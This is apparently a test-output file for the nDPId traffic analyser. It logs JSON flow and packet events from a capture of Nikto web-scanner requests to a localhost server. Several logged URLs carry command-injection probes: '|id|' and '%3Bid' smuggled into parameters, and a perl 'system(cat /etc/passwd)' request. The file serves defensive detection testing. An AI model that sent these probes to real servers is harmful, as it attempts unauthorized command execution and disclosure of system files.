-00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":1,"flow_last_seen":1576420277546,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277546,"pkt":"AAAAAAAAAAAAAAAACABFAADZI0FAAEAGGNx\/AAABfwAAAcXUH5D0qBvWdLImZ4AYAED+zQAAAQEICp1m\/lGdZv5RR0VUIC9jZmRvY3Mvc25pcHBldHMvZ2V0dGVtcGRpcmVjdG9yeS5jZm0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/snippets\/gettempdirectory.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001076)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":1,"flow_last_seen":1576420277547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420277547,"pkt":"AAAAAAAAAAAAAAAACABFAADT6e9AAEAGUjN\/AAABfwAAAcXWH5DaBdEHtMEbgIAYAED+xwAAAQEICp1m\/lOdZv5TR0VUIC9kb3N0dWZmLnBocD9hY3Rpb249bW9kaWZ5X3VzZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420277547,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/dostuff.php?action=modify_user","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001091)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":1,"flow_last_seen":1576420277549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277549,"pkt":"AAAAAAAAAAAAAAAACABFAADIKVFAAEAGEt1\/AAABfwAAAcXYH5AE3RGlWDKVx4AYAED+vAAAAQEICp1m\/lWdZv5VR0VUIC9sb2dqYW0vc2hvd2hpdHMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTU3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277549,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/logjam\/showhits.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001157)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":1,"flow_last_seen":1576420277550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277550,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/wwtAAEAGeSt\/AAABfwAAAcXaH5CLi\/vjqeJa6IAYAED+swAAAQEICp1m\/ladZv5WR0VUIC9tYW51YWwucGhwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277550,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/manual.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001158)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1576420277552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277552,"pkt":"AAAAAAAAAAAAAAAACABFAADZ8pVAAEAGSYd\/AAABfwAAAcXcH5AUWcqAeMmTFYAYAED+zQAAAQEICp1m\/lidZv5YR0VUIC9tb2RzL2FwYWdlL2FwYWdlLmNnaT9mPWZpbGUuaHRtLnxpZHwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNTkpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277552,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mods\/apage\/apage.cgi?f=file.htm.|id|","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001159)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7440000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00742{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1576420277553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1576420277553,"pkt":"AAAAAAAAAAAAAAAACABFAAD6YiVAAEAG2dZ\/AAABfwAAAcXeH5DIEFrQ9+zWrIAYAED+7gAAAQEICp1m\/lmdZv5ZR0VUIC9tb2R1bGVzLnBocD9uYW1lPU5ldHdvcmtfVG9vbHMmZmlsZT1pbmRleCZmdW5jPXBpbmdfaG9zdCZoaW5wdXQ9JTNCaWQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01115{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7440000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001160)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7440000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":1,"flow_last_seen":1576420277554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":269,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":269,"pkt_l4_len":235,"thread_ts_msec":1576420277554,"pkt":"AAAAAAAAAAAAAAAACABFAAD\/xMZAAEAGdzB\/AAABfwAAAcXgH5A8ZfwprHRx4oAYAED+8wAAAQEICp1m\/lqdZv5aR0VUIC9udWtlL21vZHVsZXMucGhwP25hbWU9TmV0d29ya19Ub29scyZmaWxlPWluZGV4JmZ1bmM9cGluZ19ob3N0JmhpbnB1dD0lM0JpZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTYxKQ0KDQo="} -01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7440000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001161)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":1,"flow_last_seen":1576420277556,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":240,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":240,"pkt_l4_len":206,"thread_ts_msec":1576420277556,"pkt":"AAAAAAAAAAAAAAAACABFAADi3pNAAEAGXYB\/AAABfwAAAcXiH5AliOZ9pOzTK4AYAED+1gAAAQEICp1m\/lydZv5cR0VUIC9wZXJsLy1lJTIwJTIyc3lzdGVtKCdjYXQlMjAvZXRjL3Bhc3N3ZCcpO1wlMjIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjIpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20%22system('cat%20\/etc\/passwd');\\%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001162)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7440000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":1,"flow_last_seen":1576420277558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":270,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":270,"pkt_l4_len":236,"thread_ts_msec":1576420277558,"pkt":"AAAAAAAAAAAAAAAACABFAAEAA3dAAEAGOH9\/AAABfwAAAcXkH5CI\/DuZGQJJI4AYAED+9AAAAQEICp1m\/l6dZv5eR0VUIC9waHBudWtlL2h0bWwvLnBocD9uYW1lPU5ldHdvcmtfVG9vbHMmZmlsZT1pbmRleCZmdW5jPXBpbmdfaG9zdCZoaW5wdXQ9JTNCaWQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7440000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/html\/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001163)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7440000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":1,"flow_last_seen":1576420277560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1576420277560,"pkt":"AAAAAAAAAAAAAAAACABFAAECBD1AAEAGN7d\/AAABfwAAAcXmH5DeDzzWjlOxJoAYAED+9gAAAQEICp1m\/mCdZv5gR0VUIC9waHBudWtlL21vZHVsZXMucGhwP25hbWU9TmV0d29ya19Ub29scyZmaWxlPWluZGV4JmZ1bmM9cGluZ19ob3N0JmhpbnB1dD0lM0JpZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7440000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001164)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":1,"flow_last_seen":1576420277561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277561,"pkt":"AAAAAAAAAAAAAAAACABFAADFzD1AAEAGb\/N\/AAABfwAAAcXoH5BUiPTWm6mSyIAYAED+uQAAAQEICp1m\/mGdZv5hR0VUIC9Qcm9ncmFtJTIwRmlsZXMvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 